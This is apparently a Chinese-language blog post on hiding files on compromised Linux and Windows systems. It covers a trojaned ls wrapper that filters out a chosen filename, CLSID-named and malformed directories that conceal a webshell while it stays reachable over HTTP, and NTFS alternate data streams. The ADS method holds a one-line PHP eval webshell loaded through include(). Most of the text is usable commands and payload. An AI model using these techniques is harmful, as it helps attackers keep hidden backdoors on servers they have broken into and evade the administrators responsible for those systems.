linux

linux中隐藏文件的方式是创建以.开头的文件名，但是由于shell中ls只要加入-a参数就可查看隐藏文件，一般加点并起不到什么作用，这里分享几种迷惑性的隐藏思路

创建…目录

由于每个目录都存在.和..两个目录

其默认不使用-a参数也不会显示

使用-a时会与.与..共同出现，有时会被人为忽略

更改ls

修改ls程序屏蔽掉特定的字符串显示

正常情况：

创建/usr/local/bin/ls

# !/bin/bash
/bin/ls $@ | grep -Ev 'testfilename'

赋予执行权限

chmod +x /usr/local/bin/ls

修改后情况：

windows

windows直接隐藏文件相对较好隐藏，但打开显示文件属性或使用命令行普通的方式就无效了，主要分享几种奇淫技巧

修改文件属性

attrib +s +a +h +r [目标文件夹]

添加了系统文件属性、存档文件属性、只读文件属性和隐藏文件属性

系统代号

新建文件夹temp，将木马文件a.php存入temp目录中，然后将文件夹temp名改为Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}

在windows中文件夹将变为我的电脑，双击打开将进入我的电脑页面，但webshell仍可使用
http://xx.xx.xx.xx/Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}/a.php访问

其他可用特殊代号

我的电脑.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
回收站.{645ff040-5081-101b-9f08-00aa002f954e}
拔号网络.{992CFFA0-F557-101A-88EC-00DD010CCC48}
打印机.{2227a280-3aea-1069-a2de-08002b30309d}
控制面板.{21ec2020-3aea-1069-a2dd-08002b30309d}
网上邻居.{208D2C60-3AEA-1069-A2D7-08002B30309D}

畸形目录

windows使用cmd创建如下畸形路径

mkdir a...\

在某些系统完全无法打开如win10

在winserver2008可打开但查看不到内部内容

在win7可以打开并查看内容，但无法直接使用图形化界面删除目录

使用copy命令将木马拷贝到路径下

copy a.php a...\a.php

可使用webshell管理工具连接木马

可使用如下命令删除目录

rd /s /q a...\

利用 ADS 隐藏文件

NTFS交换数据流（Alternate　Data　Streams，简称 ADS）是 NTFS 磁盘格式的一个特性，在 NTFS文件系统下，每个文件都可以存在多个数据流。

创建ADS隐藏文件

在命令行，echo 一个数据流进去，比如 index 文件是正常文件。

echo ^<?php @eval($_REQUEST[1]);?^> > index.php:shell.jpg

这样就生成了一个在图形化资源管理器中不可见的 index.php:shell.jpg

可使用命令行dir /r查看文件(仅dir查看不到)，使用notepad命令编辑文件

dir /r
notepad index.php:shell.jpg

使用文件包含使用其即可

<?php
include("index.php:shell.jpg")
?>

参考文档

https://mp.weixin.qq.com/s/788mROdIG0ncExDzBYcYow